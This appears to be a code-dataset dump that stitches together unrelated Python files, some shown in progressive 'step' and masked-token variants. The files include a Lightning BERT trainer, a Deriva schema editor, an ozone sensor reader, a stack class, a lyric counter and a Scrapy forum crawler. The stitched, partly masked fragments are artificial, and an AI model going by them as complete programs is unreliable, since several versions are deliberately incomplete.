"step-4": "import os\nprint(os.getcwd())\nfrom TransformerModel.Model import Model\nfrom dataset.DatasetLoader import DatasetLoader\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport argparse\nfrom argparse import ArgumentParser, ArgumentTypeError\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--pretrained', type=str, default='bert-base-uncased')\n parser.add_argument('--nr_frozen_epochs', type=int, default=5)\n parser.add_argument('--training_portion', type=float, default=0.9)\n parser.add_argument('--batch_size', type=float, default=32)\n parser.add_argument('--learning_rate', type=float, default=2e-05)\n parser.add_argument('--frac', type=float, default=1)\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n",
"step-5": "# %%\nimport os\n\nprint(os.getcwd())\n# %%\nfrom TransformerModel.Model import Model\nfrom dataset.DatasetLoader import DatasetLoader\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport argparse\nfrom argparse import ArgumentParser, ArgumentTypeError\n\n# %%\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n\n arguments_parser.num_training_steps = (\n len(data.train_dataloader()) * arguments_parser.max_epochs\n )\n\n dict_args = vars(arguments_parser)\n\n model = Model(**dict_args)\n\n arguments_parser.early_stop_callback = EarlyStopping(\"val_loss\")\n\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n\n trainer.fit(model, data)\n\n\n# %%\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"--pretrained\", type=str, default=\"bert-base-uncased\")\n parser.add_argument(\"--nr_frozen_epochs\", type=int, default=5)\n parser.add_argument(\"--training_portion\", type=float, default=0.9)\n parser.add_argument(\"--batch_size\", type=float, default=32)\n parser.add_argument(\"--learning_rate\", type=float, default=2e-5)\n parser.add_argument(\"--frac\", type=float, default=1)\n\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n\n\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
"""add_columns.py: This script reads an SCEC ETAS forecast directory name
and extracts key fields that are then added as attributes in the SCEC Deriva
schema.
This script is an example of how the ERD used by Deriva is extended as additional
information or metadata is added to the asset descriptions in Deriva.
This must be run after the create_model.py script has been run, because this modifies
the ERD created by that script.
The expectation is this is run once. If it is run a second time, we expect errors
indicating the columns already exist.
Philip Maechling
3 April 2021
"""
import os
import sys
from deriva.core import DerivaServer, ErmrestCatalog, get_credential
from deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag
if __name__ == "__main__":
# Connect to server and catalog ------------------------------------------------------------------#
hostname = 'forecast.derivacloud.org' # this is a dev server for throw-away work (change to 'forecast.derivacloud.org)
catalog_id = '5' # this was a throw-away catalog used to test this script (change to TBD)
model = Model.from_catalog(
DerivaServer('https', hostname, credentials=get_credential(hostname)).connect_ermrest(catalog_id)
)
#
# During testing, exit before any table modifications are done
#
tabname = model.schemas['ETAS'].tables["Forecast"]
print("Before Adding Column")
for column in tabname.column_definitions:
print(column.name,column.type.typename,column.nullok)
"""
Define a series of column names that reflect metadata we expect to extract from
the ETAS directory names. These are initial names, defined by developers.
ETAS modelers may want to rename these columns to be more meaningful to domain experts.
For this first version, all fields are defined as free text.
Redefinition of these values as controlled vocabularies are a future refinement.
1) Sim_Start_Time: Enumeration List
e.g: "2019_07_16"
not null
2) Catalog_Mag: Enumeration List
e.g.: "ComCatM7p1"
not null
3) Event_ID: Enumeration List
e.g.: "ci39457511"
not null
4) Post_Event_Date: Enumeration List
e.g.: "7DaysAfter"
maybe null
5) Rupture_Def: Enumeration List
e.g. "ShakeMapSurfaces"
"ShakeMapSurfaces-noSpont-full_td-scale1.14"
not null
"""
tabname.create_column(Column.define('Sim_Start_Time',
builtin_types.text,
comment="Simulation Start Time"))
tabname.create_column(Column.define('Catalog_Mag',
builtin_types.text,
comment="Catalog Name and Event Magnitude"))
tabname.create_column(Column.define('Event_ID',
builtin_types.text,
comment="Earthquake Event ID"))
tabname.create_column(Column.define('Post_Event_Date',
builtin_types.text,
comment="Days Forecast made after Mainshock"))
tabname.create_column(Column.define('Rupture_Definition',
builtin_types.text,
comment="Type of Rupture used in ETAS forecast"))
# retrieve catalog model again to ensure we reflect latest structural changes
# example shows this, but I'm not sure what it returns
print("After Adding Column")
etas_model = model.schemas['ETAS']
tabname = etas_model.tables["Forecast"]
for column in tabname.column_definitions:
print(column.name,column.type.typename,column.nullok)
sys.exit(0)
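    # Sketch (not part of the original run-once workflow): if re-running should be a
    # no-op instead of raising "column already exists" errors, each creation call
    # could be guarded on the column names already present, e.g.
    #
    #   existing = {c.name for c in tabname.column_definitions}
    #   if 'Sim_Start_Time' not in existing:
    #       tabname.create_column(Column.define('Sim_Start_Time',
    #                                           builtin_types.text,
    #                                           comment="Simulation Start Time"))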
|
normal
|
{
"blob_id": "a745f72081e06ff3399f9d7f65a30d7eef594689",
"index": 2292,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n hostname = 'forecast.derivacloud.org'\n catalog_id = '5'\n model = Model.from_catalog(DerivaServer('https', hostname, credentials=\n get_credential(hostname)).connect_ermrest(catalog_id))\n tabname = model.schemas['ETAS'].tables['Forecast']\n print('Before Adding Column')\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. \"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n tabname.create_column(Column.define('Sim_Start_Time', builtin_types.\n text, comment='Simulation Start Time'))\n tabname.create_column(Column.define('Catalog_Mag', builtin_types.text,\n comment='Catalog Name and Event Magnitude'))\n tabname.create_column(Column.define('Event_ID', builtin_types.text,\n comment='Earthquake Event ID'))\n tabname.create_column(Column.define('Post_Event_Date', builtin_types.\n text, comment='Days Forecast made after Mainshock'))\n tabname.create_column(Column.define('Rupture_Definition', builtin_types\n .text, comment='Type of Rupture used in ETAS forecast'))\n print('After Adding Column')\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables['Forecast']\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n sys.exit(0)\n",
"step-3": "<mask token>\nimport os\nimport sys\nfrom deriva.core import DerivaServer, ErmrestCatalog, get_credential\nfrom deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag\nif __name__ == '__main__':\n hostname = 'forecast.derivacloud.org'\n catalog_id = '5'\n model = Model.from_catalog(DerivaServer('https', hostname, credentials=\n get_credential(hostname)).connect_ermrest(catalog_id))\n tabname = model.schemas['ETAS'].tables['Forecast']\n print('Before Adding Column')\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. \"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n tabname.create_column(Column.define('Sim_Start_Time', builtin_types.\n text, comment='Simulation Start Time'))\n tabname.create_column(Column.define('Catalog_Mag', builtin_types.text,\n comment='Catalog Name and Event Magnitude'))\n tabname.create_column(Column.define('Event_ID', builtin_types.text,\n comment='Earthquake Event ID'))\n tabname.create_column(Column.define('Post_Event_Date', builtin_types.\n text, comment='Days Forecast made after Mainshock'))\n tabname.create_column(Column.define('Rupture_Definition', builtin_types\n .text, comment='Type of Rupture used in ETAS forecast'))\n print('After Adding Column')\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables['Forecast']\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n sys.exit(0)\n",
"step-4": "#!/usr/bin/env python\n\n\n\"\"\"add_columns.py: This script reads an SCEC ETAS forecast directory name\nand extracts key fields that are then added as attributes in the SCEC Deriva\nschema.\n\n This script is an example of how the ERD used by Deriva is extended as additional\n information or metadata is added to the asset descriptions in Deriva.\n\n This must be run after the create_model.py script has been run, because this modifies\n the ERD created by that script.\n \n The expectation is this is run once. If it is run a second time, we expect errors\n indicating the columns already exist.\n \nPhilip Maechling\n3 April 2021\n\"\"\"\nimport os\nimport sys\nfrom deriva.core import DerivaServer, ErmrestCatalog, get_credential\nfrom deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag\n\nif __name__ == \"__main__\":\n\n # Connect to server and catalog ------------------------------------------------------------------#\n\n hostname = 'forecast.derivacloud.org' # this is a dev server for throw-away work (change to 'forecast.derivacloud.org)\n catalog_id = '5' # this was a throw-away catalog used to test this script (change to TBD)\n\n model = Model.from_catalog(\n DerivaServer('https', hostname, credentials=get_credential(hostname)).connect_ermrest(catalog_id)\n )\n\n #\n # During testing, exit before any table modifications are done\n #\n\n\n tabname = model.schemas['ETAS'].tables[\"Forecast\"]\n print(\"Before Adding Column\")\n for column in tabname.column_definitions:\n print(column.name,column.type.typename,column.nullok)\n\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. \"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n\n\n tabname.create_column(Column.define('Sim_Start_Time',\n builtin_types.text,\n comment=\"Simulation Start Time\"))\n\n tabname.create_column(Column.define('Catalog_Mag',\n builtin_types.text,\n comment=\"Catalog Name and Event Magnitude\"))\n\n tabname.create_column(Column.define('Event_ID',\n builtin_types.text,\n comment=\"Earthquake Event ID\"))\n\n tabname.create_column(Column.define('Post_Event_Date',\n builtin_types.text,\n comment=\"Days Forecast made after Mainshock\"))\n\n tabname.create_column(Column.define('Rupture_Definition',\n builtin_types.text,\n comment=\"Type of Rupture used in ETAS forecast\"))\n\n # retrieve catalog model again to ensure we reflect latest structural changes\n # example shows this, but I'm not sure what it returns\n print(\"After Adding Column\")\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables[\"Forecast\"]\n for column in tabname.column_definitions:\n print(column.name,column.type.typename,column.nullok)\n\n sys.exit(0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
debt = 100
equity = 50
ratio = debt / equity
if ratio <= 2:
print('😊')
else:
print('⚠️')
print('Ratio is', ratio)
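# With debt = 100 and equity = 50 the ratio is 2.0, so the first branch runs and the
# output is the smiley line followed by "Ratio is 2.0".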
|
normal
|
{
"blob_id": "40b1fac14aaa81039aec8e80ce1c91bb881cfe78",
"index": 3474,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif ratio <= 2:\n print('😊')\nelse:\n print('⚠️')\nprint('Ratio is', ratio)\n",
"step-3": "debt = 100\nequity = 50\nratio = debt / equity\nif ratio <= 2:\n print('😊')\nelse:\n print('⚠️')\nprint('Ratio is', ratio)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import tensorflow as tf
def Float32():
return tf.float32
def Float16():
return tf.float16
|
normal
|
{
"blob_id": "c60b8eec57d845c73ee3e00432747d23748c1706",
"index": 9537,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Float32():\n return tf.float32\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef Float32():\n return tf.float32\n\n\ndef Float16():\n return tf.float16\n",
"step-4": "import tensorflow as tf\n\n\ndef Float32():\n return tf.float32\n\n\ndef Float16():\n return tf.float16\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADC121C_MQ131
# This code is designed to work with the ADC121C_I2CGAS_MQ131 I2C Mini Module available from ControlEverything.com.
# https://www.controleverything.com/content/Gas?sku=ADC121C_I2CGAS_MQ131#tabs-0-product_tabset-2
import smbus
import time, datetime
# Get I2C bus
bus = smbus.SMBus(1)
def getOzoneData():
data = bus.read_i2c_block_data(0x50, 0x00, 2)
# Convert the data to 12-bits
raw_adc = (data[0] & 0x0F) * 256 + data[1]
ppm = (1.99 * raw_adc) / 4096.0 + 0.01
return ppm
if __name__ == '__main__':
sampleTime = 1 # seconds
# ADC121C_MQ131 address, 0x50(80)
# Read data back from 0x00(00), 2 bytes
# raw_adc MSB, raw_adc LSB
while True:
data = bus.read_i2c_block_data(0x50, 0x00, 2)
# Convert the data to 12-bits
raw_adc = (data[0] & 0x0F) * 256 + data[1]
ppm = (1.99 * raw_adc) / 4096.0 + 0.01
timestmp = ((str(datetime.datetime.utcnow())).split(' ')[1]).split('.')[0]
time.sleep(sampleTime)
# Output data to screen
print(timestmp, "UTC", "Ozone Concentration : %.2f ppm" %ppm)
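# Worked example of the conversion above (made-up register bytes, illustration only):
# if the two bytes read back are 0x03 and 0xA8, then
#   raw_adc = (0x03 & 0x0F) * 256 + 0xA8 = 936
#   ppm     = (1.99 * 936) / 4096.0 + 0.01 ≈ 0.46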
|
normal
|
{
"blob_id": "678189ac5b0105c90178647843335f9d4402dc66",
"index": 1416,
"step-1": "<mask token>\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-3": "<mask token>\nbus = smbus.SMBus(1)\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-4": "import smbus\nimport time, datetime\nbus = smbus.SMBus(1)\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-5": "#!/usr/bin/python3\n# Distributed with a free-will license.\n# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.\n# ADC121C_MQ131\n# This code is designed to work with the ADC121C_I2CGAS_MQ131 I2C Mini Module available from ControlEverything.com.\n# https://www.controleverything.com/content/Gas?sku=ADC121C_I2CGAS_MQ131#tabs-0-product_tabset-2\n\nimport smbus\nimport time, datetime\n\n# Get I2C bus\nbus = smbus.SMBus(1)\n\ndef getOzoneData():\n\tdata = bus.read_i2c_block_data(0x50, 0x00, 2)\n\n\t# Convert the data to 12-bits\n\traw_adc = (data[0] & 0x0F) * 256 + data[1]\n\tppm = (1.99 * raw_adc) / 4096.0 + 0.01\n\treturn ppm\n\nif __name__ == '__main__':\n\n\tsampleTime = 1 # seconds\n\n\t# ADC121C_MQ131 address, 0x50(80)\n\t# Read data back from 0x00(00), 2 bytes\n\t# raw_adc MSB, raw_adc LSB\n\twhile True:\n\t\tdata = bus.read_i2c_block_data(0x50, 0x00, 2)\n\n\t\t# Convert the data to 12-bits\n\t\traw_adc = (data[0] & 0x0F) * 256 + data[1]\n\t\tppm = (1.99 * raw_adc) / 4096.0 + 0.01\n\n\t\ttimestmp = ((str(datetime.datetime.utcnow())).split(' ')[1]).split('.')[0]\n\t\ttime.sleep(sampleTime)\n\n\n\t\t# Output data to screen\n\t\tprint(timestmp, \"UTC\", \"Ozone Concentration : %.2f ppm\" %ppm)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class IndividualStack:
def __init__(self):
self.stack=[None]*5
class StackwithStacks:
def __init__(self):
self.stacks = []
self.stackcount=-1
self.count=0
self.st = None
def push(self, element):
if self.count%5==0:
self.stackcount = self.stackcount+1
self.count=0
self.st=IndividualStack()
self.stacks.append(self.st)
self.st.stack[self.count]=element
self.count = self.count+1
else:
self.st.stack[self.count] = element
self.count = self.count + 1
def pop(self):
if self.count == 1:
self.count=self.count-1
returnval= self.stacks[self.stackcount].stack[self.count]
self.stacks.pop()
self.stackcount=self.stackcount-1
self.count=5
return returnval
else:
self.count = self.count - 1
return self.stacks[self.stackcount].stack[self.count]
st = StackwithStacks()
st.push(1)
st.push(1)
st.push(1)
st.push(1)
st.push(1)
st.push(12)
st.push(13)
st.push(1)
st.push(4)
st.push(7)
st.push(1)
st.push(8)
st.push(1)
st.push(6)
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
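# Trace of the run above: each IndividualStack holds 5 slots, so the 14 pushes fill
# two stacks of 5 and leave 4 elements in a third; popping the last element of a
# stack discards that stack and moves back to the previous one. The 8 pops therefore
# print 6, 1, 8, 1 (draining the third stack) and then 7, 4, 1, 13 (top of the second).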
|
normal
|
{
"blob_id": "a8f52772522d1efc097c3d17d9c08199816f1168",
"index": 3785,
"step-1": "class IndividualStack:\n def __init__(self):\n self.stack=[None]*5\n\n\nclass StackwithStacks:\n def __init__(self):\n self.stacks = []\n self.stackcount=-1\n self.count=0\n self.st = None\n\n def push(self, element):\n if self.count%5==0:\n self.stackcount = self.stackcount+1\n self.count=0\n self.st=IndividualStack()\n self.stacks.append(self.st)\n self.st.stack[self.count]=element\n self.count = self.count+1\n\n else:\n self.st.stack[self.count] = element\n self.count = self.count + 1\n\n def pop(self):\n if self.count == 1:\n self.count=self.count-1\n returnval= self.stacks[self.stackcount].stack[self.count]\n self.stacks.pop()\n self.stackcount=self.stackcount-1\n self.count=5\n return returnval\n\n else:\n self.count = self.count - 1\n return self.stacks[self.stackcount].stack[self.count]\n\n\nst = StackwithStacks()\n\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(12)\nst.push(13)\nst.push(1)\nst.push(4)\nst.push(7)\nst.push(1)\nst.push(8)\nst.push(1)\nst.push(6)\n\n\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
f = open("resources/yesterday.txt", 'r')
yesterday_lyric = ""
while 1 :
line = f.readline()
if not line :
break
yesterday_lyric = yesterday_lyric + line.strip() + "\n"
f.close()
# 대소문자 구분없이 yesterday 단어의 개수 세기 : 대문자로 또는 소문자로 만들고 카운드 세기
num_of_yesterday = yesterday_lyric.upper().count("YESTERDAY")
print("Number of a Word 'YESTERDAY'", num_of_yesterday)
# 대소문자 구분하여 Yesterday 와 yesterday의 개수를 세보자.
num_of_small_yesterday = yesterday_lyric.count("yesterday")
num_of_title_yesterday = yesterday_lyric.count("Yesterday")
print("Number of a Word 'yesterday'", num_of_small_yesterday)
print("Number of a Word 'Yesterday'", num_of_title_yesterday)
|
normal
|
{
"blob_id": "8559448822b3d3989a9795e7b497a2791588c327",
"index": 9539,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile 1:\n line = f.readline()\n if not line:\n break\n yesterday_lyric = yesterday_lyric + line.strip() + '\\n'\nf.close()\n<mask token>\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\n<mask token>\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-3": "f = open('resources/yesterday.txt', 'r')\nyesterday_lyric = ''\nwhile 1:\n line = f.readline()\n if not line:\n break\n yesterday_lyric = yesterday_lyric + line.strip() + '\\n'\nf.close()\nnum_of_yesterday = yesterday_lyric.upper().count('YESTERDAY')\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\nnum_of_small_yesterday = yesterday_lyric.count('yesterday')\nnum_of_title_yesterday = yesterday_lyric.count('Yesterday')\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-4": "f = open(\"resources/yesterday.txt\", 'r')\nyesterday_lyric = \"\"\nwhile 1 :\n line = f.readline()\n if not line :\n break\n yesterday_lyric = yesterday_lyric + line.strip() + \"\\n\"\n\nf.close()\n\n# 대소문자 구분없이 yesterday 단어의 개수 세기 : 대문자로 또는 소문자로 만들고 카운드 세기\nnum_of_yesterday = yesterday_lyric.upper().count(\"YESTERDAY\")\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\n\n# 대소문자 구분하여 Yesterday 와 yesterday의 개수를 세보자.\nnum_of_small_yesterday = yesterday_lyric.count(\"yesterday\")\nnum_of_title_yesterday = yesterday_lyric.count(\"Yesterday\")\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#! /usr/bin python3
# -*- coding: utf-8 -*-
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.spiders import CrawlSpider
from scrapy.spiders import Rule
from xici_bbs.spiders.author import get_author_item
from xici_bbs.spiders.comment import get_comment_list, get_comment_next_page
from xici_bbs.spiders.post import get_post_item
class XiciSpider(CrawlSpider):
name = 'xici'
start_urls = ['http://www.xici.net']
post_extract = LxmlLinkExtractor(
allow=(
'/d\d+.htm',
),
allow_domains=(
'xici.net'
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
author_extract = LxmlLinkExtractor(
allow=(
'/u\d+$',
'/u\d+/$',
),
allow_domains=(
'xici.net',
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
follow_extract = LxmlLinkExtractor(
# allow=(
# '/s/[0-9]+',
# ),
allow_domains=(
'xici.net',
),
deny=(
'/help/',
),
deny_domains=(
'account.xici.net',
# 'life.xici.net',
)
)
rules = (
Rule(author_extract, follow=True, callback='parse_author'),
Rule(post_extract, follow=True, callback='parse_post'),
# Rule(follow_extract, follow=True, callback='parse_follow'),
Rule(follow_extract, follow=True),
)
# a_count = 0
# p_count = 0
# f_count = 0
def parse_author(self, response):
# self.a_count += 1
# print('author: ', self.a_count, ' ', response.url)
author_item = get_author_item(response)
yield author_item
def parse_post(self, response):
# self.p_count += 1
# print('post: ', self.p_count, ' ', response.url)
post_item = get_post_item(response)
for item_or_request in self.parse_comment(response, post_item):
yield item_or_request
# def parse_follow(self, response):
# self.f_count += 1
# print('follow: ', self.f_count, ' ', response.url)
def parse_comment(self, response, post_item=None):
if not post_item:
post_item = response.meta['post_item']
for comment_item in get_comment_list(response):
post_item['comment_ids'].append(comment_item['comment_id'])
yield comment_item
comment_next_page = get_comment_next_page(response)
if comment_next_page:
yield Request(
url=comment_next_page,
callback=self.parse_comment,
meta={
'post_item': post_item,
}
)
else:
yield post_item
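# Note: parse_post hands off to parse_comment, which follows a thread's "next page"
# link while carrying the accumulating post_item along in Request.meta; the post_item
# itself is yielded only after the final comment page has been consumed.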
|
normal
|
{
"blob_id": "f1eaba91e27dc063f3decd7b6a4fe4e40f7ed721",
"index": 7948,
"step-1": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-3": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n start_urls = ['http://www.xici.net']\n post_extract = LxmlLinkExtractor(allow=('/d\\\\d+.htm',), allow_domains=\n 'xici.net', deny_domains=('account.xici.net',))\n author_extract = LxmlLinkExtractor(allow=('/u\\\\d+$', '/u\\\\d+/$'),\n allow_domains=('xici.net',), deny_domains=('account.xici.net',))\n follow_extract = LxmlLinkExtractor(allow_domains=('xici.net',), deny=(\n '/help/',), deny_domains=('account.xici.net',))\n rules = Rule(author_extract, follow=True, callback='parse_author'), Rule(\n post_extract, follow=True, callback='parse_post'), Rule(follow_extract,\n follow=True)\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-4": "from scrapy import Request\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spiders import Rule\nfrom xici_bbs.spiders.author import get_author_item\nfrom xici_bbs.spiders.comment import get_comment_list, get_comment_next_page\nfrom xici_bbs.spiders.post import get_post_item\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n start_urls = ['http://www.xici.net']\n post_extract = LxmlLinkExtractor(allow=('/d\\\\d+.htm',), allow_domains=\n 'xici.net', deny_domains=('account.xici.net',))\n author_extract = LxmlLinkExtractor(allow=('/u\\\\d+$', '/u\\\\d+/$'),\n allow_domains=('xici.net',), deny_domains=('account.xici.net',))\n follow_extract = LxmlLinkExtractor(allow_domains=('xici.net',), deny=(\n '/help/',), deny_domains=('account.xici.net',))\n rules = Rule(author_extract, follow=True, callback='parse_author'), Rule(\n post_extract, follow=True, callback='parse_post'), Rule(follow_extract,\n follow=True)\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n 